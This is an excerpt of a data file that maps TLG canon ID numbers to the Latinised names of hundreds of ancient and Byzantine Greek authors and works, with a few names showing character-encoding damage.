"1611": "Tyrannion Junior Gramm.",
"0572": "Gaius Scr. Eccl.",
"4096": "Dositheus Magister Gramm.",
"0496": "Phrynichus Comic.",
"0422": "Athenio Comic.",
"0261": "Simonides Lyr.",
"4300": "Lexicon Sabbaiticum",
"2679": "Testamentum Salomonis",
"1277": "[Clinias] Phil.",
"0666": "Adrianus Rhet. et Soph.",
"2583": "Manetho Astrol.",
"2641": "Priscus Epic.",
"0370": "Lamprocles Lyr.",
"1839": "Polyphrasmon Trag.",
"1124": "Andronicus Rhodius Phil.",
"2542": "Quintus Fabius Pictor Hist.",
"2680": "Scythinus Epigr.",
"0523": "Menecrates Comic.",
"4242": "Cyrus Rhet.",
"1431": "Hipparchus Astron. et Geogr.",
"0204": "Aristonous Lyr.",
"0720": "Harmodius Trag.",
"7051": "Doctrina Patrum",
"4082": "Musaeus Grammaticus Epic.",
"0056": "Thrasybuli Epistula",
"0746": "Theophilus Protospatharius et Stephanus Atheniensis Med.",
"1840": "Euripides II Trag.",
"2531": "Metrophanes Hist.",
"0541": "Menander Comic.",
"3145": "Joannes Anagnostes Hist. et Poeta",
"0449": "Ecphantides Comic.",
"1945": "Antigenes Hist.",
"3168": "Pseudo-Codinus Hist.",
"1358": "Eudoxus Astron.",
"1298": "Demetrii Phalerei Epistula",
"1180": "[Aristaeus] Phil.",
"1524": "Naumachius Epic.",
"4184": "Dionysius Soph.",
"0631": "Pittacus [Lyr.]",
"0273": "Scolia Alphabetica",
"0212": "Philetas Eleg. et Gramm.",
"5014": "Scholia In Aristophanem",
"0392": "Acusilaus Hist.",
"9012": "Ignatius Biogr. et Poeta",
"2217": "Nicias Hist.",
"0034": "Lycurgus Orat.",
"1488": "Maximus Theol.",
"1464": "Liber Jubilaeorum",
"1787": "[Menippus] Comic.",
"1735": "Timon Phil.",
"4394": "Joannes Antiochenus Hist.",
"0012": "Homerus Epic., Homer",
"0264": "Susarion Comic.",
"2598": "Procopius Rhet. et Scr. Eccl.",
"2274": "Hesychius Illustrius Hist.",
"0096": "Aesopus Scr. Fab. et Aesopica",
"1976": "Metrodorus Hist.",
"2291": "Cratylus Phil.",
"0394": "Apollonius Comic.",
"0341": "Lycophron Trag.",
"0718": "Aรซtius Med.",
"0691": "Harpocrationis Epistula",
"0688": "Agathocles Hist.",
"1286": "Corpus Hermeticum",
"1799": "Euclides Geom.",
"0416": "Archedicus Comic.",
"0290": "Encomium Ducis Thebaidos",
"2062": "Joannes Chrysostomus Scr. Eccl., John Chrysostom",
"2336": "Hereas Hist.",
"0239": "Antimachus Eleg. et Epic.",
"1811": "Metrodorus Major Phil.",
"0377": "Telestes Lyr.",
"4039": "Paulus Silentiarius Poeta",
"1676": "Simylus Iamb.",
"1981": "Theophanes Hist.",
"1485": "Martyrium Ptolemaei Et Lucii",
"0502": "Sophilus Comic.",
"1506": "Menodotus Hist.",
"0426": "Callias Comic.",
"3130": "Theophylactus Simocatta Epist. et Hist.",
"0734": "[Lucas Apostolus] Med.",
"0497": "Plato Comic.",
"0460": "Euphro Comic.",
"1664": "Seniores Alexandrini Scr. Eccl.",
"1583": "Phanodemus Hist.",
"4165": "Anonymi In Aristotelis Librum De Interpretatione Phil.",
"0499": "Polyzelus Comic.",
"2025": "Maximus Rhet.",
"2355": "Xeniades Soph.",
"0334": "Diogenes Phil. et Trag.",
"2205": "Autesion Hist.",
"4091": "Callistratus Soph.",
"0453": "Epilycus Comic.",
"0643": "Anonymus Londinensis Med.",
"3120": "Patria Constantinopoleos",
"0981": "Stesichorus II Lyr.",
"1549": "[Onatas] Phil.",
"0338": "Sosiphanes Trag.",
"2972": "Anonymi De Terrae Motibus",
"1302": "Demetrius Rhet.",
"0046": "Niciae Epistula",
"1328": "Dionysius Hist.",
"1365": "Melampus Scriptor De Divinatione",
"2218": "Calliphon et Democedes Med. et Phil.",
"4304": "Glossae In Herodotum",
"0360": "Armenidas Hist.",
"3002": "Prolegomena De Comoedia",
"2557": "[Aristobulus] Hist.",
"2030": "Geographica Adespota (GGM)",
"0744": "Alexander Med.",
"1750": "Vitae Prophetarum",
"0543": "Polybius Hist.",
"1607": "Phoronis",
"4072": "Eutocius Math.",
"1977": "Lucius Licinius Lucullus Hist.",
"1276": "Clidemus Hist.",
"1941": "Leo Hist.",
"4325": "[Hermes] Alchem.",
"2458": "Marcellus Hist.",
"2294": "Zeno Phil.",
"0653": "Aratus Astron. et Epic.",
"0482": "Nicomachus Comic.",
"4332": "Hierotheus Alchem. et Poeta",
"1414": "Heraclitus Phil.",
"0727": "Joannes Med.",
"0598": "Rhetorica Anonyma",
"1203": "Paeanes (CA)",
"1505": "Menesthenes Hist.",
"4028": "Stephanus Gramm.",
"2645": "Stratonicus Poeta",
"1665": "Seniores Apud Irenaeum Scr. Eccl.",
"0349": "Demonax [Trag.]",
"1670": "Serapion Scr. Eccl.",
"1398": "Hegesippus Scr. Eccl.",
"0412": "Apollodorus Carystius vel Apollodorus Gelous Comic.",
"2160": "Pyrrhus Hist.",
"9021": "Stephanus Alchem.",
"1530": "Nicanor Gramm.",
"0397": "Pronomus Lyr.",
"2181": "Moses Alchem.",
"2697": "Timolaus Rhet.",
"2560": "Pythocles Hist.",
"1083": "Isigonus Paradox.",
"1315": "Dinolochus Comic.",
"1389": "Harpocration Gramm.",
"2456": "Nessas Phil.",
"1515": "Moeris Attic.",
"2032": "Pappus Math.",
"0027": "Andocides Orat.",
"2937": "Lachares Soph.",
"0900": "Cleomenes Lyr.",
"0549": "Apollodorus Gramm.",
"2423": "Asclepiades Gramm. et Hist.",
"1732": "Timachidas Hist.",
"1734": "Timaeus Phil.",
"2539": "Diophantus Hist.",
"2192": "[Agatharchides] Hist.",
"5037": "Scholia In Sophoclem",
"2225": "Parm(en)iscus Phil.",
"0297": "Lyrica Adespota (PMG)",
"0646": "Pseudo-Justinus Martyr",
"4347": "Andron Hist.",
"1004": "Thessalus Astrol. et Med.",
"1310": "Dictys Hist.",
"1303": "Demochares Hist. et Orat.",
"0098": "Zenobius Sophista [Paroemiogr.]",
"0198": "Hedylus Epigr.",
"1821": "Iambica Adespota (ALG)",
"2568": "[Sosthenes] Hist.",
"0606": "Rufus Soph.",
"2714": "Theodorus Studites Scr. Eccl. et Theol.",
"1325": "Diogenis Sinopensis Epistulae",
"4105": "Julianus Scr. Eccl.",
"1349": "Epistula A Martyribus Lugdunensibus",
"1832": "Acesander Hist.",
"0498": "Poliochus Comic.",
"1476": "Mamercus Eleg.",
"2006": "Synesius Phil.",
"0249": "Echembrotus Eleg. et Lyr.",
"1637": "Protevangelium Jacobi",
"3169": "Joannes VI Cantacuzenus",
"2642": "[Astrampsychus Magus] Onir.",
"0340": "Sositheus Trag.",
"2048": "Salaminius Hermias Sozomenus Scr. Eccl.",
"1812": "Demaratus Hist.",
"2807": "Antonius Hagiographus Scr. Eccl.",
"1491": "Melanthius Hist.",
"0331": "[Polyidus] Trag.",
"2215": "Ar(i)aethus Hist.",
"4391": "Glaucus Hist.",
"1479": "Marci Aurelii Epistula",
"1427": "Herodorus Hist.",
"1508": "Metrodorus Phil.",
"3136": "Pseudo-Zonaras Lexicogr.",
"2169": "Herillus Phil.",
"2729": "Prorus Phil.",
"1281": "[Clitophon] Hist.",
"1289": "Crates Hist.",
"0041": "Chionis Epistulae",
"0418": "Aristagoras Comic.",
"2594": "Phillis Hist.",
"1451": "Josephus Et Aseneth",
"0237": "Anacreon Lyr.",
"1308": "Demosthenes Epic.",
"2636": "Pherenicus Epic.",
"0301": "Thespis Trag.",
"0082": "Apollonius Dyscolus Gramm.",
"0127": "Aulus Licinius Archias Epigr.",
"0260": "Semonides Eleg. et Iamb.",
"0484": "Nicostratus Comic.",
"0513": "Theopompus Comic.",
"1447": "Irenaeus Theol.",
"1247": "[Cebes] Phil.",
"0230": "Lyrica Adespota (CA)",
"0286": "Carmen Astrologicum",
"4089": "Theodoretus Scr. Eccl. et Theol.",
"1813": "Anonymus De Plantis Aegyptiis",
"0477": "Myrtilus Comic.",
"1794": "Philocles Comic.",
"3094": "Nicetas Choniates Hist., Scr. Eccl. et Rhet.",
"0581": "Paradoxographus Palatinus",
"2278": "Phanodicus Hist.",
"1239": "Domitius Callistratus Hist.",
"0053": "Phalaridis Epistulae",
"0272": "De Arboribus Avibusque Fabulae",
"0657": "Crateuas Med.",
"1775": "Pseudo-Agathon Epigr.",
"0371": "Diagoras Lyr.",
"2240": "Hicetas Phil.",
"1383": "Geminus Astron.",
"1165": "Apollodorus Mech.",
"1606": "Phoenix Iamb.",
"4005": "Anonymus Discipulus Isidori Milesii Mech.",
"2189": "Callinicus Soph.",
"2233": "Pseudo-Polemon",
"0655": "Parthenius Myth.",
"2625": "Herodicus Gramm.",
"1814": "Ptolemais Phil.",
"1133": "Anonymus Diodori Phil.",
"2133": "Achilles Tatius Astron.",
"1301": "Demetrius Poet. Phil.",
"0197": "Hedyle Epigr.",
"0071": "Periplus Maris Erythraei",
"0289": "Ammonius Epigr.",
"4150": "Anacreontea",
"1285": "Conon Hist.",
"3177": "Scriptor Incertus De Leone Armenio Hist.",
"1275": "Cleostratus Poet. Phil.",
"1297": "Damippus Phil.",
"2601": "Tiberius Rhet.",
"2241": "Xenophilus Mus. et Phil.",
"1685": "Sosibius Gramm.",
"0450": "Ephippus Comic.",
"5010": "Scholia In Aeschylum",
"2235": "Hippocrates Math.",
"1577": "Phaedimus Epigr.",
"1802": "Homerica",
"2367": "Theognis Hist.",
"1282": "Clytus Hist.",
"5032": "Scholia In Oppianum",
"0611": "Theodorus Trag.",
"1682": "Sopater Comic.",
"1788": "Phormis Comic.",
"1125": "Androtion Hist.",
"1649": "Pythaenetus Hist.",
"1662": "Sciras Comic.",
"2151": "Praxagoras Hist.",
"3015": "Joannes Cameniates Hist.",
"1675": "Simylus Eleg.",
"0441": "Demonicus Comic.",
"2255": "Gorgias Hist.",
"2246": "Lycon Phil.",
"1912": "Euphantus Phil.",
"2229": "Xuthus Phil.",
"4329": "Philosophus Anonymus Alchem.",
"4014": "Priscianus Phil.",
"0593": "Gorgias Rhet. et Soph.",
"2334": "Nausiphanes Phil.",
"1322": "Diogenianus Phil.",
"0294": "Corinna Lyr.",
"0008": "Athenaeus Soph.",
"0199": "Bacchylides Lyr.",
"0548": "Pseudo-Apollodorus Myth.",
"1687": "Sosicrates Hist.",
"2532": "[Hermesianax] Hist.",
"0049": "Pisistrati Epistula",
"0531": "Hermias Apol.",
"1727": "Theotimus Hist.",
"3146": "Ducas Hist.",
"2620": "Dionysius Iambus Gramm. et Poeta",
"5048": "Scholia In Clementem Alexandrinum",
"2967": "Theodorus Heracleensis vel Theodorus Mopsuestenus Scr. Eccl.",
"1710": "[Theages] Phil.",
"3079": "Michael Attaliates Hist.",
"2701": "Georgius Pisides Poeta",
"0619": "Apollonius Phil.",
"1816": "Epica Adespota (GDRK)",
"2556": "[Alexarchus] Hist.",
"1319": "Diogenes Phil.",
"1352": "Epistula Ecclesiarum Apud Lugdunum Et Viennam",
"1399": "Pamphilus Trag.",
"2196": "[Dercyllus] Hist.",
"0361": "Cleonides Mus.",
"2592": "Joannes Pediasimus Philol. et Rhet.",
"1382": "Fragmentum Teliambicum",
"1567": "Parrhasius Epigr.",
"1590": "Philippus Hist.",
"0618": "Antigoni Epistula",
"1667": "[Septem Sapientes] Phil.",
"1138": "Lycon Phil.",
"3128": "Theognostus Gramm.",
"0243": "Callinus Eleg.",
"1595": "Philodemus Phil.",
"1753": "Xenion Hist.",
"3147": "Michael Critobulus Hist.",
"1441": "Iamblichus Scr. Erot.",
"1143": "Antiochus Phil.",
"1556": "Pancrates Epigr.",
"2585": "Marcellinus Biogr.",
"0586": "Polemon Perieg.",
"2610": "Boiscus Iamb.",
"1318": "Diodorus Rhet.",
"1663": "Semus Gramm.",
"0211": "Simias Gramm.",
"0051": "[Melissa] Phil.",
"0430": "Chariclides Comic.",
"1911": "Diyllus Hist.",
"3155": "Joannes Protospatharius Gramm.",
"4333": "Nicephorus Blemmydes Alchem.",
"1500": "Menecrates Poet. Phil.",
"3157": "Theodorus Scutariota Hist.",
"1896": "[Dositheus] Hist.",
"1287": "Crantor Phil.",
"1800": "Euboeus Parodius",
"0723": "Leo Phil.",
"3178": "Anonymi Lexeis Rhetoricae",
"1323": "Aelius Dionysius Attic.",
"0578": "Nymphodorus Hist.",
"2074": "Apollinaris Theol.",
"1737": "Titanomachia",
"2623": "Euanthes Epic.",
"2036": "Dexippus Phil.",
"4345": "Menecrates Hist.",
"0717": "Hypsicles Astron. et Math.",
"1803": "Bruti Epistulae",
"2738": "Chronographiae Anonymae",
"4163": "Telegonia",
"2111": "Palladius Scr. Eccl.",
"0023": "Oppianus Epic.",
"2041": "Marcellus Theol.",
"2499": "Eustochius Soph.",
"0574": "Lysimachus Hist.",
"1638": "Proxenus Hist.",
"0089": "Praxiphanes Phil.",
"2614": "Cleomachus Poeta",
"0621": "[Ath]enodorus Trag.",
"1712": "Thebaรฏs",
"1493": "Melinno Lyr.",
"0372": "Praxilla Lyr.",
"1353": "Epitaphium Abercii",
"2626": "Hipparchus Parodius",
"1804": "Ninus",
"5024": "Anonymi In Hermogenem Rhet.",
"0740": "Jusjurandum Medicum",
"5000": "Concilia Oecumenica (ACO)",
"2349": "[Pyrander] Hist.",
"1512": "Minyas",
"0068": "Pseudo-Scymnus Geogr.",
"2630": "Lobo Poeta",
"1175": "Archestratus Parodius",
"2284": "Anaxandridas Hist.",
"0708": "[Ammonius] Gramm.",
"1230": "[Brotinus] Phil.",
"1608": "Phrynichus Attic.",
"1756": "Demetrius Gramm.",
"2506": "Capito Hist.",
"0617": "Anaximenes Phil.",
"0350": "[Dionysius Scymnaeus] Trag. vel Comic.",
"0504": "Sosipater Comic.",
"1972": "Eumachus Hist.",
"2034": "Porphyrius Phil.",
"1115": "Archestratus Trag.",
"0335": "Philiscus Trag.",
"1557": "Panyassis Epic.",
"1495": "Melito Apol.",
"4157": "Joannes Rhet.",
"1376": "Eudemus Rhet.",
"5027": "Scholia In Iamblichum Philosophum",
"5029": "Scholia In Lucianum",
"2607": "Alexinus Phil.",
"3176": "Pseudo-Sphrantzes Hist.",
"0439": "Demetrius Comic.",
"1690": "Sotadea",
"0061": "Pseudo-Lucianus Soph.",
"0235": "Iambica Adespota (IEG)",
"2691": "[Musaeus] Phil.",
"1428": "Hestiaeus Hist.",
"1954": "Heraclides Phil.",
"2243": "Apocalypsis Sedrach",
"1622": "Polycarpus Scr. Eccl.",
"2175": "[Autocharis] Hist.",
"2693": "Ptolemaeus III Euergetes I [Epigr.]",
"2651": "Artemidorus Eleg.",
"0748": "Severus Iatrosophista Med.",
"2033": "Theon Math.",
"0206": "Theocles Lyr.",
"2242": "Echecrates Phil.",
"4024": "Agathias Scholasticus Epigr. et Hist.",
"0583": "Philochorus Hist.",
"0219": "Rhianus Epic.",
"1482": "Cyranides",
"1334": "Dius Phil.",
"0628": "Gaius Musonius Rufus Phil.",
"1164": "Apollodorus Hist.",
"1254": "Charax Hist.",
"2461": "Uranius Hist.",
"1208": "Atticus Phil.",
"0530": "Pseudo-Galenus Med.",
"0277": "Monodia",
"9019": "Stephanus Phil.",
"4038": "Pamprepius Epic.",
"1293": "Crinis Phil.",
"0622": "Cleobuli Epistula",
"0013": "Hymni Homerici, Homeric Hymns",
"1791": "Menandri Et Philistionis Sententiae",
"2289": "Echephylidas Hist.",
"0656": "Dioscorides Pedanius Med.",
"4027": "Anonymi In Aristotelis Categorias Phil.",
"1278": "Clitarchus Gnom.",
"0236": "Alcibiades [Eleg.]",
"0207": "Hermocles Lyr.",
"4172": "Vitae Oppiani",
"0221": "Euphorion Epic.",
"0245": "Demodocus Eleg.",
"5012": "Scholia In Apollonium Rhodium",
"4282": "Anonymus Manichaeus Biogr.",
"0086": "Aristoteles Phil. et Corpus Aristotelicum, Aristotle",
"2386": "Timonides Hist.",
"1466": "Lollianus Scr. Erot.",
"2171": "Stesiclides Hist.",
"0065": "Scylax Perieg.",
"0650": "Herodas Mimogr.",
"1635": "Protagoras Soph.",
"3125": "Theodosius Diaconus Hist. et Poeta",
"2121": "Dioscorus Poeta",
"2340": "Diotimus Phil.",
"2871": "Joannes Malalas Chronogr.",
"1445": "Iliu Persis",
"2962": "Petrus Scr. Eccl. et Theol.",
"0200": "Mantissa Proverbiorum",
"1346": "Ephraem Scr. Eccl.",
"2045": "Nonnus Epic.",
"0030": "Hyperides Orat.",
"2591": "Orion Gramm.",
"2479": "Patrocles Hist.",
"0255": "Mimnermus Eleg.",
"1533": "Nicias Epigr.",
"2275": "Theagenes Phil.",
"0316": "Xenocles Trag.",
"1571": "[Pempelus] Phil.",
"2695": "Vitae Aristotelis",
"0510": "Teleclides Comic.",
"0087": "Aelius Herodianus et Pseudo-Herodianus Gramm. et Rhet.",
"0210": "Euphronius Lyr.",
"DOCCAN2": "TLG Canon, data base",
"2305": "Clidemus Phil.",
"0048": "Philippus II Rex Macedonum [Epist.]",
"1609": "Phylarchus Hist.",
"1494": "Melissus Phil.",
"0085": "Aeschylus Trag.",
"1181": "Aristarchus Astron.",
"0532": "Achilles Tatius Scr. Erot.",
"0528": "Aรซtius Doxogr.",
"2616": "Demareta Poeta",
"4026": "Anonymi In Aristotelis Artem Rhetoricam Rhet.",
"1459": "Lepidus Hist.",
"0384": "Acta Justini Et Septem Sodalium",
"0213": "Hermesianax Eleg.",
"4161": "Vitae Arati Et Varia De Arato",
"1168": "Apollonius Soph.",
"0405": "Anaxandrides Comic.",
"0378": "Ariphron Lyr.",
"0300": "Acta Alexandrinorum",
"4098": "Etymologicum Gudianum",
"0016": "Herodotus Hist.",
"1192": "Ariston Phil.",
"0352": "Isidorus Trag.",
"0471": "Lynceus Comic.",
"2213": "[Timotheus] Hist.",
"1503": "Menecrates Hist.",
"0609": "Tryphon I Gramm.",
"1162": "Apollas Hist.",
"0063": "Dionysius Thrax Gramm.",
"0299": "Terpander Lyr.",
"0246": "Dionysius Chalcus Eleg.",
"2008": "Martyrium Cononis",
"1408": "Heraclides Gramm.",
"1535": "Nicocrates Hist.",
"0736": "Stephanus Med.",
"1899": "Aristonicus Hist.",
"0036": "Bion Bucol.",
"2178": "Cassius Longinus Phil. et Rhet.",
"1700": "Testamenta XII Patriarcharum",
"1340": "[Eccelus] Phil.",
"0640": "Alciphron Rhet. et Soph.",
"2960": "Oracula Tiburtina",
"0093": "Theophrastus Phil.",
"2057": "Socrates Scholasticus Hist.",
"1161": "Apocryphon Ezechiel",
"0375": "Cinesias Lyr.",
"2702": "Michael Psellus Polyhist.",
"3170": "Ephraem Hist. et Poeta",
"3074": "Constantinus Manasses Hist. et Poeta",
"0614": "Valerius Babrius Scr. Fab.",
"1875": "Aristodemus Hist. et Myth.",
"0632": "[Pythagoras] Phil.",
"2604": "Ulpianus Gramm. et Rhet.",
"0918": "Lamynthius Lyr.",
"4110": "Evagrius Scr. Eccl.",
"4117": "Eustathius Scr. Eccl. et Theol.",
"1646": "Ptolemaeus Hist.",
"2543": "Lucius Cincius Alimentus Hist.",
"0706": "Philo Med.",
"0637": "Socraticorum Epistulae",
"0566": "Theopompus Hist.",
"2860": "Alexander Scr. Eccl.",
"0308": "Ion Phil. et Poeta",
"1764": "Vettius Valens Astrol.",
"2047": "Syriani, Sopatri Et Marcellini Scholia Ad Hermogenis Status",
"0424": "Axionicus Comic.",
"0613": "[Demetrius] Rhet.",
"0251": "Euenus Eleg.",
"0535": "Demades Orat. et Rhet.",
"0026": "Aeschines Orat.",
"2948": "Acta Philippi",
"0553": "Artemidorus Onir.",
"1435": "Hippias Hist.",
"1838": "Theon Gramm.",
"2628": "Idaeus Epic.",
"0248": "Diphilus Epic. et Iamb.",
"1438": "Hippys Hist.",
"0050": "Ptolemaei II Philadelphi Et Eleazari Epistulae",
"1763": "Tryphon II Gramm.",
"0387": "Sapphus vel Alcaei Fragmenta",
"0380": "Philoxenus Lyr.",
"4239": "Severus Soph.",
"3020": "Joannes Cinnamus Gramm. et Hist.",
"1196": "Aristophanes Hist.",
"1167": "Apollonius Biogr.",
"1967": "Leschides Epic.",
"0385": "Cassius Dio Hist., Dio Cassius",
"0700": "Apollodorus Trag.",
"1724": "Theon Phil.",
"2372": "Euagon Hist.",
"2545": "Gaius Acilius Hist. et Phil.",
"1704": "Teucer Hist.",
"2903": "Minucianus Junior Rhet.",
"4330": "Cosmas Hieromonachus Alchem.",
"1918": "Timagenes Hist.",
"1189": "Aristocrates Hist.",
"4090": "Cyrillus Theol.",
"1692": "Speusippus Phil.",
"1580": "Phaestus Epic.",
"1591": "Philistus Hist.",
"2559": "[Chrysippus] Hist.",
"0409": "Antidotus Comic.",
"0322": "Dicaeogenes Trag.",
"1373": "Evangelium Philippi",
"0503": "Sosicrates Comic.",
"2578": "Joannes Gramm. et Poeta",
"2718": "Manuel Philes Poeta et Scr. Rerum Nat.",
"2798": "Pseudo-Dionysius Areopagita Scr. Eccl. et Theol.",
"1182": "[Aristeas] Epic.",
"1201": "Assumptio Mosis",
"1715": "Theodoridas Epigr.",
"0679": "Aeschrion Lyr.",
"2633": "Niceratus Epic.",
"0321": "Aeschylus Trag.",
"1779": "Anonymus Epicureus Phil.",
"0402": "Alexis Comic.",
"2409": "Dioscurides Hist.",
"2613": "Callimachus Junior Epic.",
"0007": "Plutarchus Biogr. et Phil.",
"2303": "Archelaus Phil.",
"1273": "Cleon Eleg.",
"0311": "Iophon Trag.",
"2016": "Passio Perpetuae Et Felicitatis",
"0610": "Alcidamas Rhet.",
"0636": "Socratis Epistulae",
"1437": "Hippon Phil.",
"0594": "Alexander Rhet. et Soph.",
"4238": "Athanasius Soph.",
"0005": "Theocritus Bucol.",
"1153": "Apocalypsis Adam",
"0668": "Aegimius",
"0327": "Carcinus Junior Trag.",
"2577": "Anatolius Math. et Phil.",
"1213": "Julia Balbilla Lyr.",
"0410": "Antiphanes Comic.",
"1416": "(H)eren(n)ius Philo Gramm. et Hist.",
"1193": "Ariston Phil.",
"1709": "Theagenes Hist.",
"1337": "Dorotheus Astrol.",
"0351": "[Hippothoon] Trag.",
"0268": "Mesomedes Lyr.",
"0218": "Nicaenetus Epic.",
"1288": "Craterus Hist.",
"9018": "Arsenius Paroemiogr.",
"3185": "Anonymus De Scientia Politica Hist.",
"2110": "Cyrillus Scr. Eccl.",
"1603": "[Phintys] Phil.",
"0314": "Morsimus Trag.",
"1314": "Dinias Hist.",
"1881": "Dionysius Scytobrachion Gramm.",
"2612": "Caecalus (?) Epic.",
"1309": "Dialexeis (ฮฮนฯฯฮฟแฝถ ฮปฯฮณฮฟฮน)",
"2724": "Ammonius Scr. Eccl.",
"0524": "Sophron Mimogr.",
"0347": "Serapion Trag.",
"0448": "Dromo Comic.",
"0732": "Alexander Phil.",
"0467": "Timotheus Trag.",
"2186": "Leo Hist.",
"2445": "Amometus Hist.",
"0208": "Dosiadas Lyr.",
"0406": "Anaxilas Comic.",
"0414": "Apollophanes Comic.",
"2619": "Dionysius Epic.",
"1681": "Solonis Epistulae",
"2004": "Amelii Epistula",
"1271": "Clemens Romanus Theol. et Clementina",
"2273": "Damon Hist.",
"2260": "Hippasus Phil.",
"0550": "Apollonius Geom.",
"0146": "Boethus Epigr.",
"0433": "Crates Comic.",
"0630": "Pherecydes Myth. et Phil.",
"0663": "Praecepta Salubria",
"4393": "Nonnosus Hist.",
"1016": "Ostanes Magus Alchem.",
"0623": "Cratetis Epistulae",
"0470": "Leuco Comic.",
"1304": "Democritus Phil.",
"0585": "Publius Aelius Phlegon Paradox.",
"1225": "Bion Hist.",
"0052": "Menippus Phil.",
"1395": "[Hegesinus] Epic.",
"2364": "Zeno Hist.",
"1412": "Pseudo-Heracliti Epistulae",
"0342": "Nicomachus Trag.",
"1160": "Apocalypsis Sophoniae",
"0463": "Hegemon Parodius",
"1772": "Paraleipomena Jeremiou",
"0057": "Galenus Med.",
"0395": "Diophantus Comic.",
"0141": "Athenaeus Epigr.",
"0512": "Theophilus Comic.",
"0719": "Aretaeus Med.",
"2043": "Hephaestion Astrol.",
"0494": "Philyllius Comic.",
"0265": "Timocreon Lyr.",
"1529": "Nicander Gramm.",
"0743": "Nemesius Theol.",
"1516": "Molpis Hist.",
"2580": "Joannes Laurentius Lydus Hist.",
"3141": "Georgius Acropolites Hist.",
"0542": "Julius Pollux Gramm.",
"1210": "Autolycus Astron.",
"1393": "Hegesianax Astron. et Epic.",
"0520": "Arcesilaus Comic.",
"1701": "Testamentum Abrahae",
"0518": "Xenarchus Comic.",
"0529": "Arius Didymus Doxogr.",
"0220": "Moero Epic.",
"1460": "Lesbonax Gramm.",
"2023": "Iamblichus Phil.",
"2404": "Philogelos",
"0376": "Timotheus Lyr.",
"2204": "Autocrates Hist.",
"0333": "Timocles Trag.",
"0707": "Alexis Hist.",
"0645": "Justinus Martyr Apol.",
"1248": "Celsus Phil.",
"1316": "Dinon Hist.",
"0729": "Theophilus Protospatharius Med.",
"1705": "Thales Phil.",
"0174": "Diotimus Epic.",
"2914": "Leontius Scr. Eccl.",
"1377": "Favorinus Phil. et Rhet.",
"1127": "Anonyma De Musica Scripta Bellermanniana",
"0437": "Crobylus Comic.",
"1345": "Epica Incerta (CA)",
"0217": "Anacreon Junior Eleg.",
"1680": "[Sodamus] Eleg.",
"0292": "Stesichorus Lyr.",
"2201": "[Ctesiphon] Hist.",
"2733": "Evagrius Scholasticus Scr. Eccl.",
"0714": "Anaxarchus Phil.",
"1629": "Polystratus Phil.",
"2881": "Romanus Melodus Hymnographus",
"1190": "Aristagoras Hist.",
"2039": "Diophantus Math.",
"0591": "Antisthenes Phil. et Rhet.",
"3127": "Pseudo-Nonnus",
"2766": "Eudocia Augusta Poeta",
"0436": "Crito Comic.",
"1191": "[Aristombrotus] Phil.",
"4015": "Joannes Philoponus Phil.",
"0253": "[Homerus] [Epic.]",
"0444": "Diodorus Comic.",
"1514": "Mnaseas Perieg.",
"3188": "Joannes Actuarius Med.",
"0557": "Epictetus Phil.",
"2300": "Promathidas Hist.",
"1202": "[Athamas] Phil.",
"0137": "Asclepiades Epigr.",
"1723": "Theolytus Epic.",
"1206": "Athenodorus Phil.",
"3135": "Joannes Zonaras Gramm. et Hist.",
"0302": "Choerilus Trag.",
"1720": "Theodotus Judaeus Epic.",
"2428": "Thrasyllus Hist.",
"0612": "Dio Chrysostomus Soph.",
"4081": "Colluthus Epic.",
"2009": "Martyrium Marini",
"2969": "Demonax Phil.",
"0029": "Dinarchus Orat.",
"1844": "Hera[clides] Trag.",
"5035": "Scholia In Platonem",
"5019": "Scholia In Dionysium Periegetam",
"0003": "Thucydides Hist.",
"0856": "Dieuches Med.",
"9020": "Stephanus Gramm.",
"7052": "Anthologiae Graecae Appendix",
"1177": "Pseudo-Archytas Phil.",
"1292": "Crito Phil.",
"1594": "Philo Judaeus Senior Epic.",
"0710": "Amphiarai Exilium (?)",
"0526": "Flavius Josephus Hist.",
"1477": "Manetho Hist.",
"0037": "Anacharsidis Epistulae",
"0634": "Xenocrates Phil.",
"2640": "Eusebius Phil.",
"0284": "Aelius Aristides Rhet.",
"1509": "[Milon] [Phil.]",
"0597": "Zenodorus Gramm.",
"2005": "Martyrium Pionii",
"2797": "Hesychius Scr. Eccl.",
"2424": "Chaeremon Hist. et Phil.",
"4286": "Lexica Syntactica",
"4173": "Vitae Dionysii Periegetae",
"2052": "Horapollo Gramm.",
"1434": "Hippias Soph.",
"4323": "Eugenius Alchem.",
"1155": "Apocalypsis Syriaca Baruchi",
"0269": "Nautarum Cantiunculae",
"4088": "Anthemius Math. et Mech.",
"1484": "Martyrium Polycarpi",
"0095": "Hermodorus Phil.",
"4093": "Georgius Choeroboscus Gramm.",
"2565": "Mnesimachus Hist.",
"4344": "Menecrates Hist.",
"1733": "Timaeus Hist.",
"0075": "Periplus Ponti Euxini",
"2586": "Menander Rhet.",
"0020": "Hesiodus Epic.",
"5038": "Scholia In Theocritum",
"0435": "Cratinus Junior Comic.",
"1597": "[Telauges] Phil.",
"5040": "Scholia In Xenophontem",
"3086": "Nicephorus I Scr. Eccl., Hist. et Theol.",
"1367": "Euripidis Epistulae",
"1426": "Herodes Atticus Soph.",
"1572": "[Perictione] Phil.",
"2653": "Erycius Poeta",
"0461": "Eupolis Comic.",
"1780": "Alcimenes Comic.",
"5015": "Scholia In Aristotelem",
"1154": "Apocalypsis Baruch",
"1135": "Anonymus Photii Phil.",
"1859": "Liber Jannes Et Jambres",
"1134": "Anonymus Iamblichi Phil.",
"1350": "Epistula Ad Diognetum",
"0238": "Ananius Iamb.",
"2646": "Fragmenta Adespota (SH)",
"1849": "Demetrius Trag.",
"0320": "Diogenes Trag.",
"2511": "Demetrius Hist.",
"1366": "Evangelium Bartholomaei",
"0438": "Damoxenus Comic.",
"1207": "Attalus Astron. et Math.",
"2631": "Menophilus Poeta",
"0304": "Acta Et Martyrium Apollonii",
"1636": "Protagorides Hist.",
"1738": "Tragica Adespota",
"2734": "Flavius Justinianus Imperator Theol.",
"1147": "Antiphon Soph.",
"4145": "Nicephorus Gregoras Hist.",
"0534": "Callisthenes Hist.",
"0079": "Menippus Geogr.",
"0408": "Comica Adespota (CAF)",
"1129": "Anonymi De Barbarismo Et Soloecismo Gramm.",
"0006": "Euripides Trag.",
"1552": "Oratio Josephi",
"4066": "Damascius Phil.",
"0069": "Dionysius Geogr.",
"4085": "Hesychius Lexicogr.",
"0480": "Nicochares Comic.",
"4135": "Theodorus Theol.",
"1600": "Philostratus Major Soph.",
"0017": "Isaeus Orat.",
"5031": "Scholia In Nicandrum",
"0507": "Straton Comic.",
"3158": "Theodorus Epist.",
"0367": "Tynnichus Lyr.",
"1294": "Critolaus Phil.",
"0517": "Timotheus Comic.",
"0423": "Autocrates Comic.",
